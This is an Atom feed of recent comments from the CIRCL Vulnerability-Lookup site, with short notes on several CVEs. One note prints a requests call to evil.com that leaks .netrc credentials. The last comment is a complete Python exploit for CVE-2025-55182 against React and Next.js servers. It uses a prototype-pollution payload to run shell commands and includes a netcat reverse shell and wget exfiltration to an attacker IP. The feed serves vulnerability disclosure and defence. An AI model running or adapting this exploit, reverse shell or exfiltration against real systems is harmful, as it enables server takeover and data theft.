https://cve.circl.lu/comments/feed 2025-12-10T10:31:04.602184+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent comments. https://cve.circl.lu/comment/9fd019c6-b2d5-454c-88b2-2c693681e47f 2025-12-10T10:31:04.628208+00:00 Cédric Bonhomme http://cvepremium.circl.lu/user/cedric French cybersecurity company Sekoia observed the unknown threat actors deploying a backdoor by leveraging CVE-2023-20118 (CVSS score: 6.5), a critical security flaw impacting Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers that could result in arbitrary command execution on susceptible devices. CVE-2023-20118 is leading to a webshell installation. 2025-03-03T21:30:27.513197+00:00 https://cve.circl.lu/comment/ee7a81f6-1013-4ce2-9180-897e57934f51 2025-12-10T10:31:04.628091+00:00 Cédric Bonhomme http://cvepremium.circl.lu/user/cedric Apple has released emergency security updates to patch a zero-day bug the company describes as exploited in "extremely sophisticated" attacks. The vulnerability is tracked as CVE-2025-24201 and was found in the WebKit cross-platform web browser engine used by Apple's Safari web browser and many other apps and web browsers on macOS, iOS, Linux, and Windows. 2025-03-12T08:35:57.565406+00:00 https://cve.circl.lu/comment/da6e2e7d-cb96-4560-bf1a-27df4962776e 2025-12-10T10:31:04.627959+00:00 Patrick Boulvin http://cvepremium.circl.lu/user/Belspo The vulnerabilities could be used by attackers to gain access to services and data. They can also be used to execute arbitrary commands and cause a denial of service. Confidentiality, integrity and availability are all impacted. The only solution is to upgrade immediately. 2025-05-22T07:24:41.759993+00:00 https://cve.circl.lu/comment/78842211-36a0-4523-9e9a-ea14c1b05b21 2025-12-10T10:31:04.627825+00:00 Alexandre Dulaunoy http://cvepremium.circl.lu/user/adulau On April 16, 2025, Apple released a patch for a bug in CoreAudio which they said was “Actively exploited in the wild.” This flew under the radar a bit. Epsilon’s blog has a great writeup of the other bug that was presumably exploited in this chain: a bug in RPAC. The only thing out there that I am aware of about the CoreAudio side of the bug is a video by Billy Ellis (it’s great. I’m featured. You should watch…you’re probably here from that anyways). As he mentioned in the video, “Another security researcher by the name of ‘Noah’ was able to tweak the values such that when it was played on MacOS, it actually did lead to a crash.” I think it’s still worth it to write about that ‘tweaking’ process in more detail. I had just finished another project and ended up on a spreadsheet maintained by Project Zero which tracks zero days that have been actively exploited in the wild. It just so happened that that day there had been another addition: CVE-2025-31200. I couldn’t find any writeups on it, or really any information other than the fact that it was a “memory corruption in CoreAudio” so I decided to have a look myself. How hard could it be? For more details - [https://blog.noahhw.dev/posts/cve-2025-31200/](https://blog.noahhw.dev/posts/cve-2025-31200/]) 2025-06-02T20:43:39.581242+00:00 https://cve.circl.lu/comment/a5ae6fa3-504b-4d03-a153-b9f12f911f71 2025-12-10T10:31:04.627672+00:00 Cédric Bonhomme http://cvepremium.circl.lu/user/cedric The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: ` requests.get('http://example.com:@evil.com/')` Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call. The root cause is https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245 The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved by GitHub for this issue. As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access. 2025-06-04T05:03:44.190775+00:00 https://cve.circl.lu/comment/eaca75c8-db5f-490c-a54a-c24729db5728 2025-12-10T10:31:04.627438+00:00 Cédric Bonhomme http://cvepremium.circl.lu/user/cedric This template looks at the HTML body for the rcversion value and then matches on vulnerable versions. Here is a mapping of the RAW HTML value and version mapping for Roundcube: * 10502 1.5.2 * 10601 1.6.1 * 10506 1.5.6 * 10500 1.5.0 * 10609 1.6.9 * 10611 1.6.11 * 10510 1.5.10 * 10505 1.5.5 * 10503 1.5.3 * 10610 1.6.10 * 10509 1.5.9 * 10607 1.6.7 * 10602 1.6.2 * 10606 1.6.6 * 10605 1.6.5 [More information](https://github.com/rxerium/CVE-2025-49113). 2025-06-04T13:24:17.697301+00:00 https://cve.circl.lu/comment/aaaf84c7-8007-4de5-b99f-ae9a91d6e26d 2025-12-10T10:31:04.624144+00:00 Alexandre Dulaunoy http://cvepremium.circl.lu/user/adulau " This can be abused by a malicious actor to perform action which normally should only be able to be executed by higher privileged users. These actions might allow the malicious actor to gain admin access to the website. " as mentioned in https://patchstack.com/database/wordpress/plugin/payu-india/vulnerability/wordpress-payu-india-plugin-3-8-5-account-takeover-vulnerability?_s_id=cve 2025-06-11T12:34:29.562531+00:00 https://cve.circl.lu/comment/85c55b2b-8a7a-4d34-89ec-52e38ed8903c 2025-12-10T10:31:04.620912+00:00 Patrick Boulvin http://cvepremium.circl.lu/user/Belspo RISK : Multiple vulnerabilities affect the standard TarFile library for CPython. Currently, there is no indication that the vulnerability is actively exploited, but because it is a zero-day with a substantial install base, attackers can exploit it at any moment. An attacker could exploit flaws to bypass safety checks when extracting compressed files, allowing them to write files outside intended directories, create malicious links, or tamper with system files even when protections are supposedly enabled. Successful exploitation could lead to unauthorised access, data corruption, or malware installation, especially if your systems or third-party tools handle untrusted file uploads or archives RECOMMENDED ACTION: Patch Source: ccb.be 2025-06-25T13:07:32.040392+00:00 https://cve.circl.lu/comment/b7668c06-85ed-4e3f-ab33-77c996b4e48b 2025-12-10T10:31:04.616884+00:00 Clément Fouque http://cvepremium.circl.lu/user/clement-fouque > There is growing speculation that the Red Hat compromise may be linked to a recently disclosed vulnerability in Red Hat OpenShift AI — CVE-2025-10725 (CVSS 9.9). https://www.seqrite.com/blog/anatomy-of-the-red-hat-intrusion-crimson-collective-and-slsh-extortions/ 2025-10-24T20:54:27.117034+00:00 https://cve.circl.lu/comment/2e5fbe69-3e25-46fd-b861-dd01b344fbaa 2025-12-10T10:31:04.612593+00:00 Cédric Bonhomme http://cvepremium.circl.lu/user/cedric ```python #!/usr/bin/env python3 """ CVE-2025-55182 - React Server Components RCE Exploit Full Remote Code Execution against Next.js applications ⚠️ FOR AUTHORIZED SECURITY TESTING ONLY ⚠️ Affected versions: - react-server-dom-webpack: 19.0.0 - 19.2.0 - Next.js: 15.x, 16.x (using App Router with Server Actions) The vulnerability exploits prototype pollution in the Flight protocol deserialization to achieve arbitrary code execution. Credit: - Wiz for vuln discovery - @maple3142 for first working poc - @dez_ for this vibe poc """ import requests import argparse import sys import time class CVE2025_55182_RCE: """Full RCE exploit for CVE-2025-55182""" def __init__(self, target_url: str, timeout: int = 15): self.target_url = target_url.rstrip('/') self.timeout = timeout self.session = requests.Session() def build_payload(self, command: str) -> dict: """ Build the RCE payload that exploits prototype pollution. The payload creates a fake React chunk object that: 1. Pollutes Object.prototype.then via "$1:__proto__:then" 2. Sets _formData.get to Function constructor via "$1:constructor:constructor" 3. Injects code via _prefix that gets passed to Function() """ # Escape single quotes in command escaped_cmd = command.replace("'", "'\"'\"'") # The malicious fake chunk structure payload_0 = ( '{"then":"$1:__proto__:then",' '"status":"resolved_model",' '"reason":-1,' '"value":"{\\"then\\":\\"$B1337\\"}",' '"_response":{' '"_prefix":"process.mainModule.require(\'child_process\').execSync(\'' + escaped_cmd + '\');",' '"_chunks":"$Q2",' '"_formData":{"get":"$1:constructor:constructor"}' '}}' ) return { '0': (None, payload_0), '1': (None, '"$@0"'), # Reference to chunk 0 '2': (None, '[]'), # Empty array for chunks } def execute(self, command: str) -> dict: """ Execute arbitrary command on the target server. Args: command: Shell command to execute Returns: dict with success status and any output """ print(f"[*] Target: {self.target_url}") print(f"[*] Command: {command}") headers = { 'Accept': 'text/x-component', 'Next-Action': 'x', # Invalid action ID triggers vulnerable path 'User-Agent': 'CVE-2025-55182-Exploit/1.0', } files = self.build_payload(command) result = { 'success': False, 'command': command, 'target': self.target_url, } try: print(f"[*] Sending exploit payload...") resp = self.session.post( self.target_url, headers=headers, files=files, timeout=self.timeout ) result['status_code'] = resp.status_code result['response'] = resp.text[:500] # A 500 response often indicates the exploit worked # (the command runs but the response fails to serialize) if resp.status_code == 500: print(f"[+] Exploit sent successfully (status 500)") result['success'] = True else: print(f"[?] Unexpected status: {resp.status_code}") except requests.exceptions.Timeout: # Timeout is expected - the server hangs processing the payload print(f"[+] Request timed out (expected during RCE)") result['success'] = True result['timeout'] = True except Exception as e: print(f"[-] Error: {e}") result['error'] = str(e) return result def check_vulnerability(self) -> bool: """Quick check if target is vulnerable""" print(f"[*] Checking if {self.target_url} is vulnerable...") headers = { 'Accept': 'text/x-component', 'Next-Action': 'x', } # Simple detection payload files = { '0': (None, '["$1:a:a"]'), '1': (None, '{}'), } try: resp = self.session.post( self.target_url, headers=headers, files=files, timeout=10 ) if resp.status_code == 500 and 'E{"digest"' in resp.text: print(f"[+] Target appears VULNERABLE!") return True else: print(f"[-] Target may not be vulnerable (status {resp.status_code})") return False except Exception as e: print(f"[-] Check failed: {e}") return False def reverse_shell(self, attacker_ip: str, attacker_port: int) -> dict: """ Attempt to establish a reverse shell. Args: attacker_ip: IP address to connect back to attacker_port: Port to connect back to """ # mkfifo reverse shell - works on Alpine/busybox containers revshell = ( f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f" ) print(f"\n[!] Attempting reverse shell to {attacker_ip}:{attacker_port}") print(f"[!] Start listener: nc -lvnp {attacker_port}") return self.execute(revshell) def exfiltrate(self, command: str, attacker_ip: str, attacker_port: int) -> dict: """ Execute command and send output to attacker via HTTP POST. Args: command: Command to execute attacker_ip: IP address to send output to attacker_port: Port to send output to Start a listener with: nc -lvnp PORT Output will arrive as HTTP POST body. """ # Using wget to POST command output back exfil_cmd = f'wget --post-data="$({command})" http://{attacker_ip}:{attacker_port}/ -O- 2>/dev/null' print(f"\n[!] Executing: {command}") print(f"[!] Output will POST to {attacker_ip}:{attacker_port}") print(f"[!] Start listener: nc -lvnp {attacker_port}") return self.execute(exfil_cmd) def main(): parser = argparse.ArgumentParser( description='CVE-2025-55182 React Server Components RCE Exploit', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=''' Examples: # Check if vulnerable python3 exploit_rce.py http://target:3000 --check # Execute command (blind) python3 exploit_rce.py http://target:3000 -c "id" # Execute command with output exfiltration python3 exploit_rce.py http://target:3000 --exfil "id" 10.0.0.1 4444 # Reverse shell (uses mkfifo + nc, works on Alpine) python3 exploit_rce.py http://target:3000 --revshell 10.0.0.1 4444 ''' ) parser.add_argument('target', help='Target URL (e.g., http://localhost:3000)') parser.add_argument('-c', '--command', help='Command to execute (blind)') parser.add_argument('--check', action='store_true', help='Check if vulnerable') parser.add_argument('--revshell', nargs=2, metavar=('IP', 'PORT'), help='Reverse shell to IP:PORT') parser.add_argument('--exfil', nargs=3, metavar=('CMD', 'IP', 'PORT'), help='Execute CMD and POST output to IP:PORT') parser.add_argument('-t', '--timeout', type=int, default=15, help='Request timeout (default: 15)') args = parser.parse_args() if not any([args.check, args.command, args.revshell, args.exfil]): parser.print_help() print("\n[!] Specify --check, --command, --revshell, or --exfil") return 1 exploit = CVE2025_55182_RCE(args.target, args.timeout) print("=" * 60) print("CVE-2025-55182 - React Server Components RCE") print("=" * 60) if args.check: return 0 if exploit.check_vulnerability() else 1 if args.command: result = exploit.execute(args.command) return 0 if result.get('success') else 1 if args.revshell: ip, port = args.revshell result = exploit.reverse_shell(ip, int(port)) return 0 if result.get('success') else 1 if args.exfil: cmd, ip, port = args.exfil result = exploit.exfiltrate(cmd, ip, int(port)) return 0 if result.get('success') else 1 return 0 if __name__ == '__main__': sys.exit(main()) ``` 2025-12-05T08:43:03.897961+00:00